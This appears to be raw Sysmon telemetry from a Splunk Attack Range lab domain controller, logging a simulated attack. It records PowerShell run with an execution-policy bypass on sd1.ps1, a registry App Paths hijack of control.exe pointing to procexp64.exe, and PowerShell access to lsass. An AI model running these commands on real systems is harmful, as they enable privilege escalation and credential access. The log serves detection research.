10341000x80000000000000001054963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.760{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.722{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.707{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.675{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.675{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.675{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.675{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.660{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.660{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.660{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.660{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001054952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.592{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001054951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.592{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=1BAD03CA3931966D8844C2E4D7C2B462,SHA256=2877D60F7760632BB56A991256120A7A99021E6F2BC7844553E8DAC6ABE30C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.544{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnk2021-07-12 07:47:36.117 23542300x80000000000000001054949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.538{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnkMD5=E5C8C125522D6DE0DC7A112B59DD6F48,SHA256=5022BCD7A4BE370B6A8034BCF7878CADBA4160196E3DFF8B37053F95370E897A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.537{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.522{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.490{466BC892-F87F-60EB-FF7D-00000000CF01}6156580C:\Windows\system32\conhost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.459{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F87F-60EB-FF7D-00000000CF01}6156C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 10341000x80000000000000001054942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.443{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.425{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd1.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001054937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.259{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F100E4E41237904D5A5BEE554249AC3B,SHA256=F2578529C213C162B30578EE7389FAFF9D527C60679D09AABF479AFF77C9BCE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:31.108{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25D0619AADAF177D316A6145D4091A3A,SHA256=563A50CD3F22529E40AF75DED09941971D98779F7488B74F3029D53CB7E47EBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:32.124{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B94E56AFCBF9C082F9D096BFB4BE541,SHA256=1158CDE01F034CE2A9B27F1FFAE3D67FB252E88867E5406DA034D7568536FA89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.978{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=858338C7B0D0AFC33469E234A714C209,SHA256=5D3B99B437C843E1F231C54B418AC26206783BA960D5561455E5AFFE11A5045F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13E395662AC38D5F2BBFF4052E6F5637,SHA256=873B58CF9BFF2A380641A50CD4C1F3B0A4700F6606E382B6319D4D27BB41BF5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4970114B99FD66564051BEABA33EE6A8,SHA256=5CE39BEA06945CDE6AF61DB4E6D0517EEF0C1BE0EBA52DCCF3ABEFD46F95A71D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=443455A1FE8714A8B6E8B566F65C919C,SHA256=8ADBEAD7C097D14CF9F87772FA020E2DC44E3097B49B532AE4D06EC85BA04951,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001054986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:32.425{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\procexp64.exe 354300x80000000000000001054985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:24.663{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61979-false10.0.1.12-8000- 12241200x80000000000000001054984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:08:32.294{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 10341000x80000000000000001054983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.094{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.094{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001054981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:08:32.063{466BC892-F87F-60EB-FE7D-00000000CF01}9608\PSHost.132705509114250550.9608.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 